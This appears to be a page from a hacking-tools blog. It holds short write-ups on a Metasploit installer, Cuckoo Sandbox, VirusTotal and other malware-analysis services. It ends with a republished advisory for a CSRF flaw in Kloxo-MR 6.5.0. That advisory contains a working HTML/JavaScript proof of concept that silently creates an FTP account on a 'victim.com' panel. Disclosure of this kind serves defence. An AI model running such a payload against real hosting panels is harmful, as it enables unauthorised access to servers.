MSF-Installer [Script to Automate Metasploit Framework Installation]

Script to help with installing and configuring Metasploit Framework, Armitage and the Plugins I have written on OSX and Linux

To use the script on OSX Java, Xcode and Command Development Tools from Xcode must be installed before running the script. In the case of OSX I also added the option of installing GNU GCC in the case you want to compile the old Ruby 1.8.7 that requieres it. When you download the script you must make it executable, when ran with no arguments or with -h it will how the usage help message:
$ chmod +x msf_install.sh 
$ ./msf_install.sh -h
Scritp for Installing Metasploit Framework
By Carlos_Perez[at]darkoperator.com
Ver 0.1.0

-i                :Install Metasploit Framework.
-p      :password for MEtasploit databse msf user. If not provided a roandom one is generated for you.
-g                :Install GNU GCC (Not necessary uless you wish to compile and install ruby 1.8.7 in OSX
-h                :This help message
To start the installation you just run the script with the -i option and the installation will start. In the case of OSX it will:
  • Check that dependencies are meet.
  • Check if Homebrew is installed and of not it will install it.
  • Install Ruby 1.9.3
  • Install base ruby gems.
  • Install and configure Postgres for use with Metasploit
  • Install GCC if selected.
  • Download and install Metasploit Framework.
  • Installs all necessaries Ruby Gems using bundler.
  • Configure the database connection and sets the proper environment variables.
  • Download and install the latest version of Armitage.
  • Download and install the Pentest plugin and DNSRecon Import plugin.

in the case of Ubuntu 12.10 and 13.04 it will:
  • Install all necessary packages
  • Install base ruby gems.
  • Configure Postgres for use with Metasploit
  • Download and install Metasploit Framework.
  • Installs all necessaries Ruby Gems using bundler.
  • Configure the database connection and sets the proper environment variables.
  • Download and install the latest version of Armitage.
  • Download and install the Pentest plugin and DNSRecon Import plugin.

0 comments:

Never Forget To Say Thanks :D

ExploitSearch.net [Exploit / Vulnerability Search Engine]

Exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone. 

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching. 

0 comments:

Never Forget To Say Thanks :D

Cuckoo Sandbox v0.6 [Software for Automating Analysis]


Cuckoo Sandbox is an Open Source software for automating analysis of suspicious files. To do so it makes use of custom components that monitor the behavior of the malicious processes while running in an isolated environment.
Cuckoo generates a handful of different raw data which include:
  • Native functions and Windows API calls traces
  • Copies of files created and deleted from the filesystem
  • Dump of the memory of the selected process
  • Screenshots of the desktop during the execution of the malware analysis
  • Network dump generated by the machine used for the analysis
In order to make such results more consumable to the end users, Cuckoo is able to process them and generate different type of reports, which could include:

  • JSON report
  • HTML report
  • MAEC report
  • MongoDB interface
  • HPFeeds interface

Cuckoo Sandbox 0.6 (2012-04-15)
===============================
(note for author’s blog)

This release represents a major step forward for the quality of the project: you won’t find an endless list of new features this time, but a handful of solid improvements that should make your experience with sandboxing much more pleasant.
Along with a few smaller additions, the focus of 0.6 revolves around the introduction of network logging. Until now the retrieval of the analysis results from the analysis machines happened through an inefficient and resource-expensive XMLRPC transaction. With Cuckoo Sandbox 0.6 we are now able to collect behavioral logs, dropped files, screenshots and memory dumps in real-time from the analysis machines through the use of what it’s been called ResultServer.
The advantages of this approach are multiple:
  • You will now see results coming in in real-time.
  • The memory errors and timeouts that used to occur with previous versions when trying to retrieve the resuts are now gone!
  • Even if the analysis machine is somehow compromised (crashed, shutdown or otherwise locked) you will still have complete results up to that point.
  • Probably some more advantages, but it’s already awesome as it is.

0 comments:

Never Forget To Say Thanks :D

Comodo Instant Malware Analysis [Online Automated Analysis System]

If you have a suspicious file, please submit it online by using the form below. Once the file is submitted, COMODO Automated Analysis System will scan it and report back its findings.

[Comodo Instant Malware Analysis]

0 comments:

Never Forget To Say Thanks :D

VirusTotal [Online Malware Analysis Tool]

VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal’s mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.

0 comments:

Never Forget To Say Thanks :D

VirusTotal Scanner

VirusTotal Scanner is the desktop tool to quickly perform Anti-virus scan using VirusTotal.com
VirusTotal.com is a free online scan service that analyzes suspicious files using 40+ Anti-virus applications. It facilitates the quick detection of viruses, worms, trojans, all kinds of malware and provides reliable results preventing any False Positive cases.

 'VirusTotal Scanner' is the desktop tool which helps you to quickly scan your file using VirusTotal without actually uploading the file. It performs direct Hash based scan on VirusTotal thus reducing the time taken to upload the file.
It comes with attractive & user friendly interface making the VirusTotal scanning process simpler and quicker. You can simply right click on your file and start the scan.

It is fully portable tool but also comes with Installer for local installation & un-installation. It works on wide range of platforms starting from Windows XP to Windows 8.

0 comments:

Never Forget To Say Thanks :D

Kloxo-MR 6.5.0 CSRF Vulnerability

# Exploit Title     :Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage   :https://github.com/mustafaramadhan/kloxo/tree/dev
# Version   :Kloxo-MR 6.5.0.f-2014020301
# Tested on         :Centos 6.4
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Blog              :http://www.ncoskun.com http://www.grisapka.org
# Discovery date    :03/12/2014
# CVE               :N/A
  
Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability
  
Vulnerability
================
Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
 
Poc Exploit
================
 
 <html>
 <head><title>Kloxo-MR demo</title></head>
 <script type="text/javascript">
 function yurudi(){
        ///////////////////////////////////////////////////////////
        //Kloxo-MR 6.5.0  CSRF Vulnerability         //
        //Author:Necmettin COSKUN => twitter.com/@babayarisi  //
        //Blog: http://www.ncoskun.com | http://www.grisapka.org //
        ///////////////////////////////////////////////////////////
        //Remote host
        var host="victim.com"; 
        //New Ftp Username
        var username="demouser";
        //New Ftp Password
        var pass="12345678";
        //This creates new folder under admin dir. /admin/yourfolder
        var dir="demodirectory";
        //If necessary only modify http to https ;)
        var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
 
        document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
  
  
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!

0 comments:

Never Forget To Say Thanks :D

Subscribe to: Posts (Atom)
Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.